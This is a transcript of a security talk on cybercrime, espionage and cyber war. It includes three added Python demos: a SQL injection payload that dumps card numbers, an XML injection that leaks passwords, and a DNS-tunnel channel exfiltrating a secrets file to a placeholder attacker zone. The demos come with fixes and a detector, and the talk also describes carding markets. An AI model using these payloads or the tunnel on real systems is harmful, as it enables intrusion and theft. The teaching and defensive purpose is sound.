4 ivan buetler cyber_espionage

Published in: Technology, News & Politics
  1. Ivan Bütler, Compass Security AG, Switzerland, ivan.buetler@csnc.ch. CYBERFACES. Compass Security AG, Glärnischstrasse 7, Postfach 1628, CH-8640 Rapperswil, Tel. +41 55-214 41 60, Fax +41 55-214 41 61, team@csnc.ch, www.csnc.ch
  2. Ethical Hacker / Penetration Tester; Founder & CEO, Compass Security AG; Lecturer @ University of Applied Science Rapperswil; Lecturer @ University of Applied Science Lucerne; Lecturer @ University of St.Gallen; Speaker @ BlackHat Las Vegas 2008: SmartCard (In)Security; Speaker @ IT Underground Warsaw 2009: Advanced Web Hacking; Speaker @ Swiss IT Leadership Forum Nice 2009: Cyber Underground; Founder of the Swiss Cyber Storm security conference; Board member of the Information Security Society Switzerland (ISSS); Board member of the Cyber Tycoons Anti-Warfare Foundation. © Compass Security AG www.csnc.ch
  3. Agenda: Hacking 1x1; Hacking for Fun and Honor; Hacking for Profit; Hacking for Companies / Espionage; Hacking for States / Espionage; Hacking in a War; Conclusion
  4. Hacking 1x1
  5. Hacking 1x1: the attack life cycle around the hacker toolbox: Attack Creation, Attack Exploitation, Attack Improvement, Attack Maintenance
  6. Hacking Targets
  7. We are all "easy targets". Source: Symantec Internet Security Threat Report, H1 2005: after an advisory is published, a patch takes 54 days on average, an exploit 6 days. [3] ETHZ, Stefan Frei 2009 (dissertation): "We found that exploit availability consistently exceeds patch availability since 2000."
  8. Human Proxy, Illusion, Social Engineering
  9. Direct Attack: Server Exploitation (diagram: BLOCKED / PASSED / BLOCKED)
  10. Indirect Attack (I): Man in the Middle, Phishing
  11. Indirect Attack (II): Malware, Mobile Devices, W-LAN (diagram: PASSED)
  12. Drivers behind "Hacking"
  13. Motivation for "Hacking": Hacking for Fun, Cyber Crime, Cyber Espionage, Cyber Warfare
  14. Hacking for Fun or Moral: hacking not for commerce, but for fun or for moral reasons!
  15. Joy Rider: Hacking for Honor
  16. Moral Hacking
  17. Hacking for Profit: Cyber Crime
  18. Who is the Enemy? Hacking for Fun, Cyber Crime, Cyber Espionage, Cyber Warfare
  19. How to make Money? The business case of "hackers": hacker tools; hacker services ("Rent a BotNet", "Spam the World"); trading in illegal goods
  20. Example: SQL Injection. Approach: Direct Attack. Impact: Credit Card Disclosure
  21. SQL Introduction. Protocols in the request chain: HTTPS, RMI, SQL
  22. SQL Introduction. Protocols: HTTPS + SQL hacker code, RMI, SQL. The attacker's SQL fragment travels inside the HTTPS request and is handed down the chain unchanged until the database executes it.
  23. Demo1: SQL Injection. Approach: Direct Attack. Impact: Credit Card Disclosure
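The direct attack of slides 20 to 23, as an added example that is not part of the original slides or of Compass Security's Demo1: a login form whose query is built by string concatenation, the hostile input that turns it into a card dump, and the parameterised query that stops it. The shop schema, the card numbers, the plaintext passwords and the payload string are all constructed for the demo.

```python
"""SQL injection through a login form, the vulnerable query beside
its parameterised form.

Added example: this is not code from the slides or from Compass
Security's Demo1.  The shop schema, the card numbers, the plaintext
passwords and the hostile input are all constructed for the demo.
"""
import sqlite3

# Constructed back end: the customer table the login form queries and a
# separate table holding card numbers.  Plaintext passwords are a
# shortcut for the demo, not a recommendation.
SEED = [
    "CREATE TABLE customers (id INTEGER PRIMARY KEY, username TEXT, password TEXT)",
    "CREATE TABLE cards (id INTEGER PRIMARY KEY, customer_id INTEGER, pan TEXT)",
    "INSERT INTO customers VALUES (1, 'alice', 'wonderland')",
    "INSERT INTO customers VALUES (2, 'bob', 'builder')",
    "INSERT INTO cards VALUES (1, 1, '4111111111111111')",
    "INSERT INTO cards VALUES (2, 2, '5500000000000004')",
]


def new_db():
    """In-memory SQLite database seeded with the constructed shop data."""
    conn = sqlite3.connect(":memory:")
    for stmt in SEED:
        conn.execute(stmt)
    return conn


def login_vulnerable(conn, username, password):
    """The web tier builds the statement by string concatenation, so the
    user's input is parsed as SQL syntax, not as data (the 'HTTPS + SQL
    hacker code' path on slide 22).  Returns the rows the database produced."""
    sql = ("SELECT username, password FROM customers "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchall()


def login_safe(conn, username, password):
    """Same query with bound parameters: the driver sends the values
    separately from the statement, so quotes and keywords in them never
    reach the SQL parser as syntax."""
    sql = ("SELECT username, password FROM customers "
           "WHERE username = ? AND password = ?")
    return conn.execute(sql, (username, password)).fetchall()


# Constructed hostile username: closes the string literal, appends a
# UNION that reads the card table with a matching column count, and
# comments out the rest of the original statement.
CARD_DUMP_PAYLOAD = "' UNION SELECT pan, customer_id FROM cards --"


def dump_cards_via_login(conn):
    """What the attacker gets back through the login form: every card
    number in the shop, i.e. the credit card disclosure the slide names."""
    rows = login_vulnerable(conn, CARD_DUMP_PAYLOAD, "anything")
    return sorted(pan for pan, _ in rows)


if __name__ == "__main__":
    db = new_db()
    print("vulnerable:", dump_cards_via_login(db))
    print("parameterised:", login_safe(db, CARD_DUMP_PAYLOAD, "anything"))  # []
```

The UNION payload works because the login query returns two columns, so the attacker's SELECT must also return two; in a real test the column count is found by trial. The fix is the bound parameters in `login_safe`, not input filtering: the same payload is then looked up as a literal username and matches nothing.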
  24. How to make Money? (1): a market for anonymous trading is required!
  25. Show: Video 1: Cyber Market
  26. Trading of illegal goods: Dumps: stolen credit card data; Carders: providers of "dumps"; Carding: using dumps; WU: Western Union; WMZ: WebMoney; LR: Liberty Reserve; CVVs: card verification values; Drops: remailing locations; Rippers: sellers who cheat other participants; CVV verification services
  27. "5000 unexpired/valid CC dumps: $2000". Money rule: how to pay for the illegal goods? Payment with Liberty Reserve.
  28. Liberty Reserve? An anonymous Internet currency.
  29. Liberty Reserve as e-currency: both seller and buyer need an LR account; the LR account is anonymous (diagram: Anonymous ↔ Anonymous).
  30. LR requires "exchangers": real money is exchanged into LR currency; direct payment into an LR account is not possible; more than 100 LR-enabled exchangers (exchanger banks). The exchanger relationship rests on trust.
  31. How to make Money? (2): money mules and money laundering
  32. Example PostFinance (Phishing): transaction via a money mule
  33. MELANI says ... Response from the cyber underground to a MELANI request. Reference: Marc Henauer, Head of MELANI, ISSS St.Gallen conference, 29 April 2010
  34. How to make Money? (3): split hacking from the financial benefit
  35. Splitting "Hacking" and Financial Benefit (diagram: Hacking | Financial Benefit)
  36. Example: XML Injection. Approach: Direct Attack. Impact: Credential Disclosure
  37. XML Introduction. Protocol: HTTPS + XML; the front end turns the request into an XML query for the back end.
  38. XML Injection. Protocol: HTTPS + XML hacker code; XML parser attack: the attacker's fragment is parsed as part of the document.
  39. Demo2: XML Injection. Approach: Direct Attack. Impact: Credential Disclosure
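The XML injection of slides 36 to 39, as an added example that is not part of the original slides or of Compass Security's Demo2: a front end that pastes the username into an XML query for an internal user service, the input that makes the service return the password instead of the display name, and the same front end built with the XML library so the input stays text. The query format, the user directory, the back end and the hostile input are constructed for the demo.

```python
"""XML injection: a front end that builds an XML query by string
concatenation, beside the same front end building it with a proper
XML library.

Added example: not code from the slides or from Compass Security's
Demo2.  The query format, the user directory, the back end and the
hostile input are constructed for the demo.
"""
import xml.etree.ElementTree as ET

# Constructed user directory behind the XML service.  The back end is an
# internal service that trusts the front end, so it hands out any field
# the query names, including the password.  That trust is the problem
# the injection exploits.
USERS = {
    "alice": {"name": "Alice", "email": "alice@shop.example", "password": "wonderland"},
    "bob": {"name": "Bob", "email": "bob@shop.example", "password": "builder"},
}


def build_query_vulnerable(username):
    """Front end, vulnerable: the username is pasted into the XML text,
    so markup in it becomes markup in the document (the 'HTTPS + XML
    hacker code' path on slide 38)."""
    return (f"<query><username>{username}</username>"
            "<fields>name</fields></query>")


def build_query_safe(username):
    """Front end, fixed: build the tree with the library and serialise
    it, so '<', '>' and '&' in the username are written as entities and
    the parser on the other side sees one text node, not new elements."""
    root = ET.Element("query")
    ET.SubElement(root, "username").text = username
    ET.SubElement(root, "fields").text = "name"
    return ET.tostring(root, encoding="unicode")


def backend_lookup(xml_text):
    """Constructed back end: parse the query, look the user up and return
    the requested fields.  findtext() returns the first matching element,
    which is exactly what the injection below relies on."""
    root = ET.fromstring(xml_text)
    user = USERS.get(root.findtext("username"))
    if user is None:
        return None
    wanted = [f.strip() for f in root.findtext("fields").split(",")]
    return {f: user[f] for f in wanted if f in user}


# Constructed hostile username: closes <username>, inserts its own
# <fields> element ahead of the legitimate one, then reopens <username>
# so the document stays well-formed and the parser accepts it.
CREDENTIAL_PAYLOAD = "alice</username><fields>password</fields><username>"


def attack(build):
    """Run the hostile username through the given front-end builder."""
    return backend_lookup(build(CREDENTIAL_PAYLOAD))


if __name__ == "__main__":
    print("vulnerable:", attack(build_query_vulnerable))  # {'password': 'wonderland'}
    print("fixed:", attack(build_query_safe))              # None
```

Escaping at the front end closes the injection, but the disclosure is only possible because the back end answers any field name a trusted caller asks for; a complete fix also takes the password out of what the user service will ever return.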
  40. Cyber Espionage: they go after information ...
  41. Who is the Enemy? Hacking for Fun, Cyber Crime, Cyber Espionage, Cyber Warfare
  42. How to rule the World
  43. Example: USB Trojan. Approach: Indirect Attack. Impact: Advanced Persistent Threat
  44. Virus Construction Toolkit: covert channel out of the company network to the Internet; delivery on a USB stick / CD-ROM; started via auto-start; the attacker controls the computer of the victim
  45. Demo3: USB Trojan. Approach: Indirect Attack. Impact: Remote control of the victim (RAT), access to files
  46. Covert Channels I: Direct. Simple inside-out attack (Corporate LAN → Internet). Direct channels: ACK tunnel; TCP tunnel (POP, Telnet, SSH); UDP tunnel (syslog, SNMP); ICMP tunnel; IPsec, PPTP
  47. Covert Channels II: Proxified. Advanced inside-out attack (Corporate LAN → LAN proxy → DMZ proxy → Internet). Proxified channels: SOCKS; SSL tunnel; HTTP/S tunnel (the HTTP payload is the tunnel); HTTP/S proxy CONNECT method tunnel; DNS tunnel; FTP tunnel; mail tunnel
  48. Advanced Persistent Threat
  49. Advanced Persistent Threat (diagram: agents on zombie hosts, each reporting to the C&C server)
  50. Advanced Persistent Threat: Command & Control Communication. The client polls the (DNS) server repeatedly (POLL, POLL, POLL), receives a command file and executes the commands. Command set: 1. POLL; 2. GET FILE TO CLIENT; 3. PUT FILE TO SERVER; 4. EXECUTE @ CLIENT; 5. EXIT CLIENT
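The DNS tunnel of slide 47 carrying the PUT FILE TO SERVER step of slide 50, as an added example that is not part of the original slides or of Compass Security's Demo3, with both ends of the channel and the detection check a defender would run over resolver logs. The zone name `cdn-update.example`, the exfiltrated file content, the benign log lines and the detection thresholds are all constructed assumptions.

```python
"""DNS as a covert C&C channel, both ends, plus a detection heuristic.

Added example: not code from the slides or from Compass Security's
Demo3.  It shows the 'DNS tunnel' of slide 47 carrying the 'PUT FILE TO
SERVER' step of slide 50: the agent smuggles a file to the C&C inside
the query names it sends through the corporate resolver.  The zone
name, the file content, the benign log lines and the thresholds are all
constructed assumptions.
"""
import base64
import collections
import math

TUNNEL_DOMAIN = "cdn-update.example"   # assumed attacker-controlled zone
MAX_LABEL = 63                         # DNS label length limit
MAX_NAME = 253                         # DNS name length limit


def encode_query(seq, chunk):
    """Agent side: base32 a chunk (the alphabet is DNS-safe and
    case-insensitive), cut it into labels, prefix a sequence label and
    append the zone so the resolver forwards the query to the attacker."""
    data = base64.b32encode(chunk).decode().rstrip("=").lower()
    labels = [data[i:i + MAX_LABEL] for i in range(0, len(data), MAX_LABEL)]
    name = ".".join([f"s{seq}"] + labels + [TUNNEL_DOMAIN])
    assert len(name) <= MAX_NAME, "chunk too large for one query"
    return name


def decode_query(qname):
    """C&C side: strip the zone, read the sequence number, join the data
    labels, restore base32 padding and decode."""
    parts = qname.split(".")
    labels = parts[:-(TUNNEL_DOMAIN.count(".") + 1)]
    seq = int(labels[0][1:])
    data = "".join(labels[1:]).upper()
    data += "=" * (-len(data) % 8)
    return seq, base64.b32decode(data)


def split_for_tunnel(payload, chunk=16):
    """One query per chunk; 16 bytes become a 26-character label."""
    return [encode_query(i, payload[i * chunk:(i + 1) * chunk])
            for i in range(math.ceil(len(payload) / chunk))]


def reassemble(qnames):
    """Order by sequence number, so queries may arrive out of order."""
    pieces = sorted(decode_query(q) for q in qnames)
    return b"".join(data for _, data in pieces)


def label_entropy(label):
    """Shannon entropy in bits per character of a single label."""
    counts = collections.Counter(label)
    return -sum(c / len(label) * math.log2(c / len(label)) for c in counts.values())


def suspicious_zones(qnames, min_queries=5, min_label=20, min_entropy=3.0, hit_ratio=0.7):
    """Defender side: group queries by zone (last two labels) and flag a
    zone when most of its distinct subdomains carry a long, high-entropy
    label.  Ordinary hostnames are short and low-entropy; encoded data is
    neither.  Thresholds are tunable assumptions, not measured values."""
    subdomains = collections.defaultdict(set)
    for q in qnames:
        parts = q.lower().rstrip(".").split(".")
        zone, sub = ".".join(parts[-2:]), ".".join(parts[:-2])
        if sub:
            subdomains[zone].add(sub)
    flagged = []
    for zone, subs in subdomains.items():
        longest = [max(s.split("."), key=len) for s in subs]
        hits = sum(1 for l in longest
                   if len(l) >= min_label and label_entropy(l) >= min_entropy)
        if len(subs) >= min_queries and hits >= hit_ratio * len(subs):
            flagged.append(zone)
    return sorted(flagged)


# Constructed: a configuration file the agent exfiltrates, and a few
# ordinary lookups of the kind the corporate resolver sees all day.
SECRET_FILE = (b"db_user=shop_app\ndb_pass=Tr0ub4dor&3\n"
               b"api_key=4f3c2a9e1b7d6085\nsmtp_pass=Summer2010!\n")
BENIGN_QUERIES = [f"{h}.example.org" for h in
                  ("www", "mail", "api", "static", "cdn", "login")]

if __name__ == "__main__":
    queries = split_for_tunnel(SECRET_FILE)
    print(queries[0])
    print(reassemble(queries) == SECRET_FILE)          # True
    print(suspicious_zones(queries + BENIGN_QUERIES))  # ['cdn-update.example']
```

The channel needs no direct connectivity from the zombie host to the Internet: the corporate resolver carries the queries out, which is why slide 47 lists DNS among the proxified channels. The detector runs on resolver logs alone; its thresholds are starting points and a real deployment also looks at query volume per client and at TXT/NULL answers, which a tunnel uses for the GET FILE direction.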
  51. APT Design Pattern. First infection: installation of a user-land virus or Trojan horse; the virus does not require local admin privileges; it talks back to the command & control server (C&C); it gets the latest updates from the C&C (very important!); if the C&C is unreachable: self-destroy routine. Privilege elevation: elevate privileges with a 0-day exploit; keyboard sniffer; create encrypted storage; evidence protection; get the latest updates; send the collected information (important); if the C&C is unreachable: sleep for 90 days
  52. What to do if we find out we are compromised? How to handle long-term attacks
  53. Advanced Persistent Threat: Incident Handling, C&C Traffic Redirection. Redirect the agents' C&C traffic away from the real C&C server to an anti-APT zombie or C&C host under the incident team's control, which runs its own update service. Problems!!! The updates are encrypted / signed, so reverse engineering of the agent or the C&C protocol is required.
  54. US Report, Nov. 2008: "China has an active cyber espionage program. Since China's current cyber operations capability is so advanced, it can engage in forms of cyber warfare so sophisticated that the United States may be unable to counteract or even detect the efforts. By some estimates, there are 250 hacker groups in China that are tolerated and may even be encouraged by the government to enter and disrupt computer networks."
  55. Cyber War: cyber is a new military domain of operations
  56. USA: Cyber Command. On June 23, 2009, the Secretary of Defense directed the Commander of U.S. Strategic Command to establish USCYBERCOM. The Director of NSA is also the Commander of Cybercom (one officer holds both posts). http://www.defense.gov/cyber
  57. USA: New Domain of Operations: Cyber. Land, Sea, Air, Space, Cyber. C⁴ISR (command and control, communications, computers, intelligence, surveillance, and reconnaissance)
  58. War Assets: Critical Infrastructures
  59. Switzerland: http://www.bevoelkerungsschutz.admin.ch/internet/bs/de/home/themen/ski/kritische_infrastrukturen.html
  60. 1) Cyber Attack: Government
  61. 2) Cyber Attack: Power and Energy
  62. 3) Cyber Attack: Trash Recycling
  63. 4) Cyber Attack: Finance
  64. 5) Cyber Attack: Health
  65. 7) Cyber Attack: IT & Telecommunication
  66. 8) Cyber Attack: Food
  67. 9) Cyber Attack: Public Security
  68. 10) Cyber Attack: Traffic & Transport
  69. Cyber Defense in Switzerland?
  70. Divisionär (Major General) Kurt Nydegger: he has the mandate to take stock of the situation and to present a defence strategy to the Federal Council. The task is complex, because the threat picture is diffuse.
  71. Conclusion & Recommendations
  72. Recommendations: Set up basic security (against script kiddies). Identify the critical assets that are essential for your business and secure them very strictly, even against internal users (their computers could be compromised). Test your security: penetration tests. Monitor your infrastructure day and night. Prepare yourself for an APT incident: think about how you would monitor your perimeter network traffic, how you would reverse-engineer encrypted C&C traffic, and how you would communicate with your employees, the media, stakeholders, shareholders and management.
  73. Discussion / Questions?!
  74. Thank You – Ivan Bütler. Compass Security AG, Werkstrasse 20, P.O. Box 2037, CH-8645 Jona SG, Switzerland. Tel. +41 55 214 41 60, Fax +41 55 214 41 61, team@csnc.ch, www.csnc.ch, ivan.buetler@csnc.ch